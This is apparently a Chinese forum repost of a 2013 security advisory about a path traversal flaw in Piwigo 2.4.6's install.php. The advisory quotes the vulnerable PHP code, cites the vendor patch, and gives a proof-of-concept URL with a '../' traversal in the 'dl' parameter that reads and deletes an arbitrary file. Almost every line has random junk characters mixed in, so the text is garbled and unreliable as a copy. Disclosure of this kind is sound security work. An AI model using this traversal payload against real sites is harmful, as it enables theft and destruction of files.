Piwigo是用PHP编写的相册脚本。
+ m/ Q3 b( V# B9 }, P1 I; l/ G& U& n( ?, Q& R) A4 C& I
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。
0 Y. z* i; @# a5 d1 E0 c====================================================================
% \5 l9 k8 F$ }1 Z& p' J- _/install.php:
! s' \( p& o% y-------------9 a; w8 U6 r% |! l: S5 j* m
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
$ ~ w% U4 {9 {1 ]114: {6 Q( O: U7 |! _/ Q% u
115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];7 e2 k" J: T, w$ a' V7 z3 ^" }' {
116: header('Cache-Control: no-cache, must-revalidate');
8 p) R% G* t2 x9 b117: header('Pragma: no-cache');
7 f# L* h8 v% N8 f118: header('Content-Disposition: attachment; filename="database.inc.php"');
' z+ I' w2 s- `/ z d' a2 y& c# T" t119: header('Content-Transfer-Encoding: binary'); j1 A* }' G: q }
120: header('Content-Length: '.filesize($filename));
4 ]5 r- Z5 a$ G; ~& y3 Z' y0 y0 l121: echo file_get_contents($filename);- V" y- {- s1 t
122: unlink($filename);
9 h8 G3 w! K+ x% M6 R123: exit();7 n& Q1 M4 Y7 [3 g
124: }
# W! R3 L- q7 f5 X2 Y* e4 v& I- o$ z1 l====================================================================1 W I9 K9 g. D1 ~+ `) F
* P* L% D8 g$ b0 tTested on: Microsoft Windows 7 Ultimate SP1 (EN)8 q( r+ N0 p; Q% {* {# x. }
Apache 2.4.2 (Win32)
4 ~! H+ K+ D- q. L0 ? L4 q/ w PHP 5.4.4
# x5 `/ ?# K- S+ x/ c ?2 V MySQL 5.5.25a
' s" k7 f1 Q. I( h8 m5 z& }7 c* h # q# C$ a! B' L5 L/ d
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
- b- m/ O: f8 U6 k8 [ @zeroscience
1 d2 K$ O6 i- N0 `1 y% K
- }6 J4 c7 ^1 {6 u d' l( K/ ZAdvisory ID: ZSL-2013-5127' \8 Z" O; y F9 Y
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php4 S$ {' \: ?) S* G
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
7 t9 c+ N7 i H) ~6 D; h" B5 g $ A! w' p" M' B) `' X* w
15.02.2013) J5 P1 D3 X# d0 _ \
, ~+ n* K( ?) z: _
--, H8 ]) W! d$ b4 m. w; |" B0 l- P
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt/ L. d$ \3 i* p2 C- ?+ h
) ~; s$ _! g/ n$ m' `9 P# B! S |